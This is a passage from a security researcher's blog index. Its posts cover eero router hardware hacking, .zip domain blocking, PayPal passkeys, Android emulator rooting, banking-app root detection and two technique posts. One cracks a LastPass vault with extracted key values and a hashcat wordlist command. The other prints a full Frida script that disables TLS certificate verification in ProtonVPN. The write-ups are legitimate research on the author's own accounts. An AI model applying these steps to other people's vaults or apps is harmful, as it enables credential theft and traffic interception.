[ 0.257039] hw-breakpoint: maximum watchpoint size is 8 bytes. [ 0.258847] CPU: IPQ6000, SoC Version: 1.0 [ 0.259603] qcom,cpr4-apss-regulator b018000.cpr4-ctrl: CPR valid fuse count: 4 [ 0.260563] IPC logging disabled [ 0.260569] IPC logging disabled [ 0.260574] IPC logging disabled [ 0.260579] IPC logging disabled [ 0.260583] IPC logging disabled [ 0.260852] sps:sps is ready. [ 0.261582] console [pstore0] enabled [ 0.261590] pstore: Registered ramoops as persistent store backend [ 0.261599] ramoops: attached 0x100000@0x50100000, ecc: 0/0 ----[CUT]---- You can find the full serial log at eero-6-serial-output.txt\nFrom the serial output, we know that:\nUses U-Boot version 1.2.7-0d393c56b2-l\nSecure boot enabled\nCan\u0026rsquo;t interrupt boot sequence :(\nSoC is a Qualcomm IPQ6000 datasheet - requires virtual points :(\nSummary This was an on-and-off project that lasted a few months, where I would find time after my day job. I\u0026rsquo;ve learned a lot, but there\u0026rsquo;s still more to learn. This project definitely sparked my curiosity about hardware hacking again. But I can\u0026rsquo;t say I wasn\u0026rsquo;t a bit disappointed at not being able to extract the flash firmware or get a shell. Maybe in part 2 ;)\nI hope somebody finds this post useful and can continue the research.\nNext steps Try to bypass the U-Boot secure boot protection, to at least get a shell by interrupting the boot process, or dump the firmware image. Figure out the right sequence for configuring the JTAG interface and halting the main CPU. Test out fault injection attacks.
De-solder the Kingston (EMMC04G-M627) NAND chip to extract the firmware.\nFurther reading\nHardware Debugging for Reverse Engineers Part 2: JTAG, SSDs and Firmware Extraction\nI Hack, U-BOOT\nHacking the Apple AirTags Def Con 29 by Thomas Roth (stacksmashing) ","permalink":"https://markuta.com/eero-6-hacking-part-1/","title":"Hacking Amazon's eero 6 (part 1)"},{"categories":null,"contents":"A short guide on how to block the entire .zip TLD using pfSense, in particular using a package called pfBlocker-NG, which can be thought of as a \u0026ldquo;PiHole\u0026rdquo; alternative. pfBlocker-NG is capable of much, much more, but that won\u0026rsquo;t be covered in this blog.\nWhy is the .zip TLD a problem? It\u0026rsquo;s simple really: phishing. Whether it\u0026rsquo;s abusing an HTTP URI scheme or using special Unicode characters, having a .zip TLD, when .zip has always been associated with the compressed file extension, is just a bad idea.\nHere are some excellent resources explaining the problem in greater detail:\nThe Dangers of Google’s .zip TLD - the author mentions a bug reported in Chromium which allowed hostnames containing U+2044 (⁄) and U+2215 (∕), characters almost identical to the forward slash (/) in URL paths, which can be used to trick users. Zip domains, a bad idea nobody asked for - also references the above. google-zip-mov-domains-social-engineers-shiny-new-tool - mentions there hasn\u0026rsquo;t been active abuse (yet).
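The U+2215 trick from the first link can be demonstrated with Python's URL parser: since the division slash is not a path separator, everything before the @ is parsed as userinfo and the real host becomes the trailing .zip domain. The URL below is a made-up illustration (modern browsers reject such hostnames, which is what the Chromium bug was about):

```python
from urllib.parse import urlparse

# U+2215 (∕) looks like '/', but it is NOT a URL path separator, so the
# parser treats everything before '@' as userinfo and the real host is
# the .zip domain at the end. (Hypothetical URL for illustration.)
url = "https://example.com\u2215download\u2215files@update.zip/setup"
print(urlparse(url).hostname)  # update.zip
```

To a casual reader the URL appears to point at example.com, yet a client following it would connect to update.zip.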
Install package Note: It\u0026rsquo;s now recommended to install the pfBlockerNG version rather than the pfBlockerNG-devel version, since both versions have synced up.\nOn your pfSense admin panel, go to System and Package Manager.\nSelect Available Packages, make sure it\u0026rsquo;s the latest version, then hit Install.\nConfigure package A new option will now be available under the Firewall menu called pfBlockerNG.\nGo to the DNSBL pane and make sure these options are enabled:\nEnable DNSBL Wildcard Blocking (TLD)\nWhilst on the same page, scroll down until you see TLD Blacklist/Whitelist and expand it. Next, add your chosen TLD to the TLD Blacklist input field (without the dot). You can block multiple TLDs, but they must be entered one per line, e.g.\nzip\nmov\npw\nzw\nke\nquest\nsupport\nWhen you\u0026rsquo;re done, click Save DNSBL settings.\nThe final step is to reload the settings by going to Update (still in the pfBlockerNG menu) and clicking on Reload. If you don\u0026rsquo;t, it\u0026rsquo;ll update automatically in 1 hour by default.\nConfirming Browser When any of the devices on my network try to access a .zip domain, they\u0026rsquo;ll get an error. More specifically, the domain will resolve to an internal address which shows a \u0026ldquo;this site has been blocked\u0026rdquo; message.\nThis page can also be customised by modifying the dnsbl_active.php file located at:\n/usr/local/www/pfblockerng/www/dnsbl_active.php\nDNS lookup pfBlockerNG was configured to use an IP range outside my VLAN. All the blocked domains will resolve to 10.10.10.1. Here\u0026rsquo;s an example of using the dig utility:\n➜ ~ dig +short nic.zip\n10.10.10.1\n➜ ~ dig +short 124.zip\n10.10.10.1\n➜ ~ dig +short latest.zip\n10.10.10.1\n➜ ~ dig +short stable.zip\n10.10.10.1\n➜ ~ dig +short winrar.zip\n10.10.10.1\nOther misused TLDs In 2021, Palo Alto\u0026rsquo;s Unit 42 threat intelligence team published a blog about their research into popular top-level domains used in cyber crime.
The team looked at several different TLDs across six categories (Malicious, Phishing, Malware, Grayware, C2, and Sensitive).\nA table from Palo Alto\u0026rsquo;s blog of the TLDs with the highest number of malicious domains:\n","permalink":"https://markuta.com/blocking-zip-domains/","title":"How to block .zip domains with pfSense"},{"categories":null,"contents":"PayPal\u0026rsquo;s Help Center - Technical Support post shows how Passkeys work on its platform and how users can add new security devices. This covers both iOS and Android, but also desktop systems. It also goes into more detail on what to do when you\u0026rsquo;ve lost your device, and much more.\nTL;DR: As of 26th May 2023, PayPal only supports external security keys (such as Yubikeys) as \u0026ldquo;Passkeys\u0026rdquo; for two-factor authentication. Passkeys on mobile devices like iOS or Android still do NOT work, even though you can register one. I am based in the UK, but US users have also experienced these same issues.\nUpdate 2025/04/16: PayPal has fixed the issues and users are now able to register and log in via the passkeys authentication method. I have confirmed this using my personal mobile device.\nIt only took 2 years ;)\nRegistering a device To register a Passkey, log in to your PayPal account and go to Account Profile, then Security and 2-step verification, and select update. You will then be presented with this browser window:\nThere are two options: Use a phone or tablet or USB security key. I opted to use my iPhone as a security device, since Apple introduced support for Passkeys in iOS 16. A QR code is presented, which users scan with their device\u0026rsquo;s camera to save the Passkey to their iCloud account.\nNote: The QR code disappears almost immediately, making it really difficult to add a Passkey to a mobile device in the first place.
I did manage to add it to my iPhone (running iOS 16.5), but only after several attempts.\nUpon \u0026ldquo;successful\u0026rdquo; registration, you\u0026rsquo;ll receive a confirmation email stating that a new FIDO key has been enrolled to your account, and that you will need to use this option moving forward.\nTrying to log in I made three attempts to log in using a security key:\na desktop (MacBook Air running macOS 12.6.5)\na mobile device (iPhone 12 running iOS 16.5)\na Yubikey 5C\nDesktop device On my MacBook Air, after entering my username and password I needed to select Try another way on the 2FA page, as I had not selected the Passkey as the default option.\nWhat I expected was for my security device (iPhone) to get some kind of notification regarding the authentication request. Instead, I got a browser dialog stating \u0026ldquo;Insert your security key and touch it\u0026rdquo;, with no other options. This request will ultimately time out and fail.\nI was forced to cancel the authentication request and use my Authenticator app instead.\nMobile device I then tried to log in using my iPhone (Safari), again much like the previous authentication steps. But this time I got an error stating security keys are only supported on \u0026ldquo;Desktop devices\u0026rdquo;, even though I could register one.\nVery confusing.\nYubikey Registering a Yubikey was straightforward, and the log-in process worked well. This was the only option that worked successfully.\nPayPal community discussions A post on PayPal\u0026rsquo;s community discussion forum shows other users experiencing the exact same issue. Most are able to register a security device (iPhone) but can\u0026rsquo;t actually use it for log-ins.
Others are unable to find the settings.\nThere are other posts just like the above.\nA few slow responses from PayPal moderators suggest the Passkey feature is only being rolled out in the US; however, several users from the US are also experiencing the same problems.\nSummary PayPal is probably well aware of this issue but doesn\u0026rsquo;t seem to be taking action on the matter. It\u0026rsquo;s also very confusing for users, since PayPal publishes these types of press releases (from March 2023). But after testing, it clearly has issues, and not just for users in the UK but in the US too.\nI can confirm that PayPal only supports Yubikey-type security devices as Passkeys. But if you don\u0026rsquo;t have one then I\u0026rsquo;d just stick to using an authentication app. Maybe this will get sorted in the future, but who knows.\n","permalink":"https://markuta.com/paypal-passkeys/","title":"PayPal and Passkeys issues since launch"},{"categories":null,"contents":"This is a short blog post on how you can get root access on an Android 12 emulated device with Google services, using a tool (script) called rootAVD by newbit1. I also share a few recommendations which are helpful during mobile analysis.\nAndroid Studio For mobile analysis I generally use my Google Pixel 3a device. However, sometimes I will try to avoid it if I can, especially when I\u0026rsquo;m only curious about an app\u0026rsquo;s network traffic or API endpoints. I will use the Android Studio device emulator instead.\nAndroid Studio supports three types of system images:\nGoogle Services and PlayStore Google Services Open source project (without Google API or PlayStore) The following screenshot shows an example of different system images available under the device creation configuration pane. You can see there are various target, architecture, and API version options:\nI opted for the Android 12 arm64-v8a image with Google Services and PlayStore.
This configuration was chosen because I\u0026rsquo;m running on the Apple M1 chip, and I also want to be able to download apps from the PlayStore.\nNote: Not all apps are available from the Play Store on an emulated device.\nrootAVD rootAVD is available on GitHub https://github.com/newbit1/rootAVD. It is a collection of scripts that automatically modify Android Studio Virtual Device system files, in order to gain root using Magisk.\nThere are really only three steps:\nCreate an AVD in Android Studio Show a list of available AVDs and paths: ./rootAVD.sh ListAllAVDs Select an AVD to be rooted: ./rootAVD.sh ~/Library/Android/sdk/system-images/android-31/google_apis_playstore/arm64-v8a/ramdisk.img Extras After successfully rooting a device, I highly recommend doing the following.\nInstall Magisk Modules These are some of the modules I use to extend the features of Magisk.\nAlwaysTrustUserCertificates by Jeroen Beckers - move user certs into system store. MagiskFrida by ViRb3 - start a Frida server during device boot. Universal SafetyNet Fix by kdrag0n - attempt to bypass Google\u0026rsquo;s SafetyNet features. Create a Snapshot Once your virtual device has been configured, I suggest creating a snapshot. This is especially helpful when you\u0026rsquo;re analysing malicious apps, or when you\u0026rsquo;re doing something dangerous which might corrupt the system.\n","permalink":"https://markuta.com/rooted-android-12-emulator/","title":"Getting root on an Android 12 emulated device with Google Services"},{"categories":null,"contents":"In this post I will go into technical details on what attackers could do with the stolen encrypted vaults, specifically how they could use tools like Hashcat to crack vault passwords and get access to sensitive log-in credentials.\nTo simulate the stolen data, I will use my test Lastpass account to extract an encrypted vault from the Chrome Browser extension on macOS.
Following this, I will use a wordlist attack to brute-force the vault, which has a weak and guessable password.\nUpdate: Fixed a few mistakes and added more clarification.\nUpdate 2: More clarification on cracking section, added unencrypted URLs to the what was stolen section, and added a link to a Hashcat benchmark for Lastpass from 2013.\nWhat happened? The Verge published an article which includes a great summary of the breach. There is also a blog post by Lastpass themselves. To summarise, in August 2022 Lastpass suffered a data breach where customer data and source code were stolen. Lastpass didn\u0026rsquo;t do a good job at letting the public (and customers) know how bad the breach actually was.\nWhat was stolen?\na backup of customer vault data unencrypted website URLs company names, end-user names, billing addresses, email addresses, telephone numbers, and IP addresses source-code and other intellectual property What can attackers do with the stolen vaults? It really depends; there are a lot of things to consider. A few things that spring to mind are:\nHow are the encrypted vaults stored in the cloud? Did a customer set a weak and easily guessed vault password? What is the key iteration (default or custom)? Other factors not covered? And since I don\u0026rsquo;t know what the stolen data looks like, or how it may be encrypted, this blog post is only a theory and estimation based on data I have access to. This includes the SQLite database used by the Browser extension and data within it.\nIn the next sections I will demonstrate how to extract the encrypted vault database from the Chrome extension and pull out specific information to start cracking with Hashcat.\nLastpass Browser extension On Chrome Browsers each extension has a unique ID. The Lastpass extension uses hdokiejnpimakedhajhdlcegeplioahd as the ID. You can confirm this by visiting the URL chrome-extension://hdokiejnpimakedhajhdlcegeplioahd/vault.html in your address bar.
You will be presented with the vault log-in page.\nYou can think of it as a local site that uses HTML and JavaScript within your Browser.\nExtracting encrypted vault All extensions have their own folders, which are stored locally on the system in various locations depending on the OS.\nAs per the Lastpass support page, devices using Chrome Browsers on Windows systems store the vault data in the following path:\n%LocalAppData%\\Google\\Chrome\\User Data\\Default\\databases\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0 On macOS systems the location is slightly different:\nNote: I use two Profiles on Chrome, hence why you see Profile 1 instead of Default.\nLastpass SQLite database In this folder a SQLite file named 1 (last written using SQLite version 3039004) should be present. This is where encrypted vault data is stored and used by the extension.\n➜ file 1 1: SQLite 3.x database, last written using SQLite version 3039004, file counter 21, database pages 22, cookie 0x5, schema 4, largest root page 11, UTF-8, vacuum mode 1, version-valid-for 21 You can then use a tool like DB Browser for SQLite to view the database contents. I also copied it to Desktop and renamed the file to lastpass-vault-macos-chrome.sqlite so it\u0026rsquo;s easier to remember.\nAll the interesting data is stored in a table called LastPassData. To start cracking Lastpass vault passwords using Hashcat you need three things:\nKey value Iteration count Account email address (hashed in database) These need to be formatted like so: KEY:ITERATION:EMAIL\nKey value To retrieve the key value, search the type column for the value key, and then in the data column select the second row, e.g.
T4vInfZ+6MGDeEendq4gvA== as shown below:\nYou can also execute the following SQL query:\nSELECT substr(data, -24) FROM LastPassData WHERE type = \u0026#39;key\u0026#39;; It is base64 encoded, which you can decode and get the hex value by:\necho \u0026#34;T4vInfZ+6MGDeEendq4gvA==\u0026#34; | base64 -d | xxd -p We now have the first requirement: 4f8bc89df67ee8c1837847a776ae20bc\nIteration count To retrieve the iteration count, search the type column for the value accts, and then take the first few characters of the data column before the ;. Lastpass changed the default iteration in 2018 from 5000 to 100100.\nYou can also execute the following SQL query:\nSELECT SUBSTR(data,0,INSTR(data,\u0026#39;;\u0026#39;)) FROM LastPassData WHERE type = \u0026#39;accts\u0026#39;; We now have the second requirement: 100100\nEmail The database contains a hashed email address value. But we do know that attackers already have this info since the recent Lastpass compromise included email addresses. For the purposes of this blog, I am not going to share the email address which I used.\nFormatted hash With all the requirements the hash should look like this:\n4f8bc89df67ee8c1837847a776ae20bc:100100:test@example.com Cracking Lastpass vaults with Hashcat As a proof of concept I used my MacBook Air with the M1 chip to crack passwords. The speed was absolutely horrible at 1110 H/s (hashes per second), but it did work. Attackers, on the other hand, can leverage multi-GPU setups with optimised drivers that could easily reach speeds of 2,000,000+ H/s e.g.
a benchmark from 2013.\nAs an example of bruteforcing vaults with weak passwords, I downloaded the popular rockyou.txt wordlist and put my actual vault master plaintext password inside (I was lazy and didn\u0026rsquo;t want to reset my password to a weak one); obviously attackers can\u0026rsquo;t do this.\nI then set the following Hashcat options:\nhashcat -a 0 -m 6800 lastpass-hash.txt ~/Downloads/rockyou.txt -a 0 attack mode Wordlist -m 6800 Lastpass hash algorithm lastpass-hash.txt formatted hash (KEY:ITERATION:EMAIL) rockyou.txt wordlist of plaintext passwords + my password Note: This is only to demonstrate that the extracted values from the above section do in fact correspond to the master vault password; you should ignore the time shown, as it will take much longer than 29 seconds.\nAnd there we have it, the master vault plaintext password successfully recovered.\nUseful Links and References Lastpass Data Breach covered by The Verge (2022) Lastpass new App hash extraction on Hashcat Forums (2020) Lastpass hashes on Hashcat Forums (2013) Hashcat lastpass benchmark (2013) Breaking Lastpass by Elcomsoft (2020) ","permalink":"https://markuta.com/cracking-lastpass-vaults/","title":"Cracking encrypted Lastpass vaults"},{"categories":null,"contents":"A short blog on how to bypass certificate pinning on the ProtonVPN macOS app using Proxyman and Frida. ProtonVPN is a VPN service operated by the Swiss company Proton AG. The service features a client application that users can install on various platforms, such as Android TV and Chromebook.\nI\u0026rsquo;ve personally had a Proton email account for quite a while now, but never really looked into the VPN service.
I was mainly curious about how the macOS app communicates with the backend, and what API end-points it talks to.\nFirst Attempt At first I tried to use the HTTP_PROXY environment variable within a Bash shell, set to my local Burp Proxy listener 127.0.0.1:8080, and then started the ProtonVPN binary manually, located at /Applications/ProtonVPN.app/Contents/MacOS/ProtonVPN.\nOutput produced when running the binary manually:\n➜ ~ /Applications/ProtonVPN.app/Contents/MacOS/ProtonVPN objc[67247]: Class _TtC5Timer26TimerFactoryImplementation is implemented in both /Applications/ProtonVPN.app/Contents/Frameworks/Timer_DA7C99285C6_PackageProduct.framework/Versions/A/Timer_DA7C99285C6_PackageProduct (0x103194860) and /Applications/ProtonVPN.app/Contents/Frameworks/vpncore.framework/Versions/A/vpncore (0x105acd890). One of the two will be used. Which one is undefined. objc[67247]: Class _TtC5Timer29BackgroundTimerImplementation is implemented in both /Applications/ProtonVPN.app/Contents/Frameworks/Timer_DA7C99285C6_PackageProduct.framework/Versions/A/Timer_DA7C99285C6_PackageProduct (0x1031948f0) and /Applications/ProtonVPN.app/Contents/Frameworks/vpncore.framework/Versions/A/vpncore (0x105acd920). One of the two will be used. Which one is undefined. objc[67247]: Class _TtC14KeychainAccess8Keychain is implemented in both /Applications/ProtonVPN.app/Contents/Frameworks/vpncore.framework/Versions/A/vpncore (0x105acc7d0) and /Applications/ProtonVPN.app/Contents/Frameworks/KeychainAccess.framework/Versions/A/KeychainAccess (0x102a105b8). One of the two will be used. Which one is undefined. 2022-12-21 10:44:03.080 ProtonVPN[67247:1556413] Could not find image named \u0026#39;VPNWordmarkNoBackground\u0026#39;. 2022-12-21 10:44:03.096 ProtonVPN[67247:1556413] Could not find image named \u0026#39;ic-exclamation-circle-filled\u0026#39;. However, this was unsuccessful as the app just ignored the proxy settings.\nSecond Attempt My next attempt was to use a tool called Proxyman.
Proxyman is able to proxy network traffic from applications to its own proxy listener. Just like with Burp Suite, it too requires a custom Certificate Authority (CA) installed on the system to analyse encrypted HTTPS traffic.\nLaunching ProtonVPN while Proxyman was running, the app still showed an error when trying to connect and log in. A standard general error message \u0026ldquo;Proton servers are unreachable\u0026hellip;\u0026rdquo; wasn\u0026rsquo;t very helpful:\nBut when looking at the Proxyman error messages it was immediately clear that certificate pinning was in place. These error messages were extremely helpful in getting around the protections. I got Internal Error responses for all the HTTPS requests. The error message:\nSSL Handshake Failed handshakeFailed(NIOSSL.BoringSSLError.sslError([Error: EOF during handshake])) This was a key piece of information that led me to discover the TLS implementation within ProtonVPN, namely BoringSSL via the SwiftNIO SSL library. From there I started to look for how this could be bypassed.\nBoringSSL/SwiftNIO SSL SwiftNIO SSL is a Swift package that contains an implementation of TLS based on BoringSSL. From the error message above it appears ProtonVPN makes use of it.\nVerifying the use of BoringSSL NOTE: On macOS systems you need to Disable SIP to attach to other processes with Frida. You can do this by holding the power button until you reach the recovery utility, and then get to the terminal and type: csrutil disable and reboot.\nTo confirm the ProtonVPN app actually uses the library, I used a Frida script (just the JavaScript part) to enumerate modules which are loaded into memory when the app is executed. The script simply prints to standard output, which I also save to a text file.\nGet the ProtonVPN app process PID with frida-ps and grep.\nAnd then run frida -p 6074 -l enum-modules.js -o protonvpn-modules.txt\n➜ frida -p 6074 -l enum-modules.js -o protonvpn-modules.txt ...
Module name: libCGInterfaces.dylib - Base Address: 0x1a9330000 Module name: RawCamera - Base Address: 0x1abb52000 Module name: AppSSOCore - Base Address: 0x18ffc2000 Module name: libboringssl.dylib - Base Address: 0x188ae4000 Module name: libusrtcp.dylib - Base Address: 0x191afa000 Module name: libquic.dylib - Base Address: 0x1a423e000 Module name: liblog_network.dylib - Base Address: 0x1a4e15000 ... As seen above the libboringssl.dylib module is loaded at the address 0x188ae4000.\nYou can also use frida-trace to trace function calls targeting the libboringssl.dylib module. For example: frida-trace -p 67505 -i 'libboringssl.dylib!*psk*' which outputs:\nInstrumenting... SSL_CTX_set_psk_server_callback: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_CTX_set_psk_server_callback.js\u0026#34; SSL_CTX_use_psk_identity_hint: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_CTX_use_psk_identity_hint.js\u0026#34; SSL_set_psk_server_callback: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_set_psk_server_callback.js\u0026#34; SSL_CTX_set_psk_client_callback: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_CTX_set_psk_client_callback.js\u0026#34; SSL_set_psk_client_callback: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_set_psk_client_callback.js\u0026#34; boringssl_context_set_psk_identity_hint: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/boringssl_context_set_psk_identity_hint.js\u0026#34; SSL_get_psk_identity_hint: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_get_psk_identity_hint.js\u0026#34; SSL_get_psk_identity: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_get_psk_identity.js\u0026#34; SSL_use_psk_identity_hint: Loaded handler at \u0026#34;/Users/naz/__handlers__/libboringssl.dylib/SSL_use_psk_identity_hint.js\u0026#34; Started tracing 9 functions. 
Press Ctrl+C to stop. To trace all the functions in a module: frida-trace -p 67505 -I 'libboringssl.dylib'\nThird Attempt (bypass with Frida) A quick Google search on how to bypass BoringSSL reveals this handy little Frida script by @apps3c. Although it says it\u0026rsquo;s made for iOS platforms, the code can also be used on macOS applications without any extra modifications.\nThis is because the iOS libboringssl.dylib module is almost (if not) identical to the macOS implementation, which uses the same underlying function names that we are trying to hook.\nAt a high level the Frida script works like this:\nCheck the libboringssl.dylib module is loaded (otherwise, load it manually). Initialise and set a few custom variables. Create a new implementation of specific SSL functions. Wait and hook these functions and replace the return value. Running Save the Frida script to e.g. BoringSSL-bypass.js and run ProtonVPN using Frida:\nfrida /Applications/ProtonVPN.app/Contents/MacOS/ProtonVPN -l BoringSSL-bypass.js Result And the result is we can now view the (previously encrypted) HTTPS traffic with the Proxyman app!\nA few API end-points and URLs observed:\nhttps://api.protonvpn.ch/vpn/countries/count https://api.protonvpn.ch/vpn/featureconfig/dynamic-bug-reports https://api.protonvpn.ch/domains/available?Type=login https://protonvpn.com/download/macos-update3.xml https://api.protonvpn.ch/auth/info https://api.protonvpn.ch/auth https://api.protonvpn.ch/auth/2fa https://api.protonvpn.ch/vpn/location https://api.protonvpn.ch/vpn/streamingservices https://api.protonvpn.ch/vpn https://api.protonvpn.ch/vpn/loads https://api.protonvpn.ch/vpn/sessioncount https://api.protonvpn.ch/auth/v4/sessions/forks https://api.protonvpn.ch/vpn/v1/partners?WithImageScale=2 https://api.protonvpn.ch/vpn/v2/clientconfig https://api.protonvpn.ch/vpn/logicals?WithTranslations=true\u0026amp;WithPartnerLogicals=1
https://api.protonvpn.ch/core/v4/notifications?FullScreenImageSupport=PNG\u0026amp;FullScreenImageWidth=2880.0\u0026amp;FullScreenImageHeight=1750.0 https://api.protonvpn.ch/vpn/v1/certificate References and Links Flutter based macOS thick client ssl pinning bypass Malware analysis with dynamic binary instrumentation frameworks Appendix Enumerate modules script // Source: https://github.com/poxyran/misc/blob/master/frida-enumerate-modules.py Process.enumerateModules({ onMatch: function(module){ console.log(\u0026#39;Module name: \u0026#39; + module.name + \u0026#34; - \u0026#34; + \u0026#34;Base Address: \u0026#34; + module.base.toString()); }, onComplete: function(){} }); iOS 13 pinning bypass script /* Description: iOS 13 SSL Bypass based on https://codeshare.frida.re/@machoreverser/ios12-ssl-bypass/ and https://github.com/nabla-c0d3/ssl-kill-switch2 Source: https://codeshare.frida.re/@federicodotta/ios13-pinning-bypass/ * Author: @apps3c */ try { Module.ensureInitialized(\u0026#34;libboringssl.dylib\u0026#34;); } catch(err) { console.log(\u0026#34;libboringssl.dylib module not loaded. 
Trying to manually load it.\u0026#34;) Module.load(\u0026#34;libboringssl.dylib\u0026#34;);\t} var SSL_VERIFY_NONE = 0; var ssl_set_custom_verify; var ssl_get_psk_identity;\tssl_set_custom_verify = new NativeFunction( Module.findExportByName(\u0026#34;libboringssl.dylib\u0026#34;, \u0026#34;SSL_set_custom_verify\u0026#34;), \u0026#39;void\u0026#39;, [\u0026#39;pointer\u0026#39;, \u0026#39;int\u0026#39;, \u0026#39;pointer\u0026#39;] ); /* Create SSL_get_psk_identity NativeFunction * Function signature https://commondatastorage.googleapis.com/chromium-boringssl-docs/ssl.h.html#SSL_get_psk_identity */ ssl_get_psk_identity = new NativeFunction( Module.findExportByName(\u0026#34;libboringssl.dylib\u0026#34;, \u0026#34;SSL_get_psk_identity\u0026#34;), \u0026#39;pointer\u0026#39;, [\u0026#39;pointer\u0026#39;] ); /** Custom callback passed to SSL_CTX_set_custom_verify */ function custom_verify_callback_that_does_not_validate(ssl, out_alert){ return SSL_VERIFY_NONE; } /** Wrap callback in NativeCallback for frida */ var ssl_verify_result_t = new NativeCallback(function (ssl, out_alert){ custom_verify_callback_that_does_not_validate(ssl, out_alert); },\u0026#39;int\u0026#39;,[\u0026#39;pointer\u0026#39;,\u0026#39;pointer\u0026#39;]); Interceptor.replace(ssl_set_custom_verify, new NativeCallback(function(ssl, mode, callback) { // |callback| performs the certificate verification. 
Replace this with our custom callback ssl_set_custom_verify(ssl, mode, ssl_verify_result_t); }, \u0026#39;void\u0026#39;, [\u0026#39;pointer\u0026#39;, \u0026#39;int\u0026#39;, \u0026#39;pointer\u0026#39;])); Interceptor.replace(ssl_get_psk_identity, new NativeCallback(function(ssl) { return \u0026#34;notarealPSKidentity\u0026#34;; }, \u0026#39;pointer\u0026#39;, [\u0026#39;pointer\u0026#39;])); console.log(\u0026#34;[+] Bypass successfully loaded \u0026#34;); ","permalink":"https://markuta.com/protonvpn-macos-certificate-pinning-bypass/","title":"Bypass ProtonVPN macOS Certificate Pinning with Proxyman and Frida"},{"categories":null,"contents":"In this post I will be comparing root detection features on 24 UK mobile banking apps using the latest version of Magisk (v24.3) on a Google Pixel 3a. You can head straight to the comparisons table if you want to see the results.\nTest Device The device used was a Google Pixel 3a running Android 10. It had been rooted using the latest version of Magisk, which was v24.3 at the time of writing. I had also installed the latest versions of three Magisk modules: MagiskFrida, Move Certificates, and Universal SafetyNet Fix, all of which were enabled during testing.\nMethodology The test itself is fairly basic. Every app was downloaded directly from the Google PlayStore and not from a third-party or mirroring site. The app versions were the latest available as of 15th March 2022. I ran each app in three different Magisk configurations:\nDefault Magisk config Attempting to hide Magisk by renaming the app Renaming the app and also enabling Zygisk with an enforced denylist I also made sure to clear each app\u0026rsquo;s cached files and storage before running them under a different configuration.\nConfiguration Go to Settings and scroll down: rename Magisk, enable Zygisk, and select denylists: Frida I also included a check on whether an instance of Frida is detected.
Frida is a dynamic instrumentation toolkit used for reverse engineering software and bypassing certain security restrictions.\nfrida -U -l hook.js -f com.bank.name --no-pause I used the above command to spawn each app while supplying a hook.js script, to try to bypass certificate pinning. If the app crashes or stops responding I assumed Frida\u0026rsquo;s process injection was being detected.\nBank comparisons All testing was conducted on 15th March 2022 with the latest available app versions.\nTop UK Banks A no means root or Frida is not detected. No visual indications like warnings or app crashes. The app runs as normal and I can get to the log-in menu without issues. Note: It\u0026rsquo;s possible that passive detection features do exist but don\u0026rsquo;t limit usability.\nA yes means root or Frida is detected. A warning message may be displayed and/or the app stops working entirely, and fails to launch properly.\n# Bank Version Magisk (default) Magisk (rename) Magisk (denylist) Frida (inject) 1 Barclays 2.55.0 yes yes no yes 2 HSBC 3.17.1 yes* yes* yes* yes 3 NatWest 07.15.0001.36.0 no no no no 4 RBS 07.15.0001.36.0 no no no no 5 Lloyds 85.01 no no no yes 6 Santander 4.19.1 (12) yes yes yes yes 7 Nationwide 21.0.1 no no no no 8 TSB 6.2.3 yes yes no no 9 Halifax 85.01 no no no yes notes:\nBarclays gives a warning message and exits. Injecting with Frida crashes the app. HSBC gives a warning but doesn\u0026rsquo;t exit. Injecting with Frida crashes the app. Lloyds hangs when injecting with Frida and does not open the app. Santander gives a warning and exits. Injecting with Frida hangs the app. Halifax crashes the app when injecting with Frida.
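The crash-based heuristic used in this test (if the app dies shortly after Frida spawns it, assume injection was detected) can be scripted. A rough, hypothetical sketch: the check helper, the 2-second grace period, and the stand-in commands are all my own assumptions; in real use the spawned command would be the frida invocation shown earlier, not sleep or false.

```shell
#!/bin/sh
# Hypothetical sketch of the crash heuristic: spawn the target, give it a
# grace period, and classify it as "detected" if it exits on its own.
# In real use "$@" would be: frida -U -l hook.js -f com.bank.name --no-pause
check() {
  "$@" &                                  # spawn the target command
  pid=$!
  ( sleep 2; kill "$pid" ) 2>/dev/null &  # watchdog kills survivors after 2s
  wait "$pid"
  if [ $? -ge 128 ]; then                 # killed by the watchdog: it survived
    echo "not detected"
  else                                    # exited by itself within the window
    echo "detected"
  fi
}
check sleep 10   # long-lived stand-in process
check false      # stand-in for an app that crashes on injection
```

Running this prints not detected followed by detected; swapping the stand-ins for the real frida command (and a longer grace period) would approximate the per-app test loop.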
Other Banks # Bank Version Magisk (default) Magisk (rename) Magisk (denylist) Frida (inject) 1 Amex 6.51.0 no no no no 2 Capital One 8.56.8149 no no no no 3 Chase 1.9.0 no no no yes 4 Clydesdale 22.2.181 no no no no 5 Co-op 20211001 yes yes no no 6 First Direct 4.13.0 yes* yes* yes* no 7 M\u0026amp;S 4.18.0 yes yes yes yes 8 Tesco 4.12.0 no no no yes 9 Triodos 3.30.0 no no no no 10 Monzo 4.22.1 no no no no 11 Virgin Money 22.2.181 no no no no 12 Starling 2.40.0.62912 yes yes no no 13 Sainsbury\u0026rsquo;s 2.8.0 yes yes yes no 14 Metro 9.10.1 yes yes no no 15 MBNA 85.01 no no no yes notes:\nChase hangs when injecting with Frida. TSB exits without a warning. M\u0026amp;S bank crashes every time, even when injecting with Frida. First Direct gives a warning but allows you to use the app. Starling gives a warning and exits. Metro gives a warning and exits. Sainsbury\u0026rsquo;s gives a warning but allows you to use the app. Tesco bank crashes when injecting with Frida. Co-op gives a warning then exits. Resources Magisk Github Magisk Issues MagiskFrida module by ViRb3 SafetyNet-fix module by kdrag0n Move Certificates by yochananmarqos ","permalink":"https://markuta.com/magisk-root-detection-banking-apps/","title":"Comparing root detection on banking apps with latest version of Magisk"},{"categories":null,"contents":"Back story As part of an out-of-country car repair, my partner\u0026rsquo;s dad suspected that his transmission had been switched out for a faulty one without his permission. He noticed that after a second trip to a different mechanic, the car was not performing as expected, so he asked me to help find out when his part was changed.\nThe vehicle was a Hyundai Santa Fe 2008 bought in Bulgaria. It had a VIN of KMHSH81WP8U272568, with a transmission number of U7LFP467454. The replacement 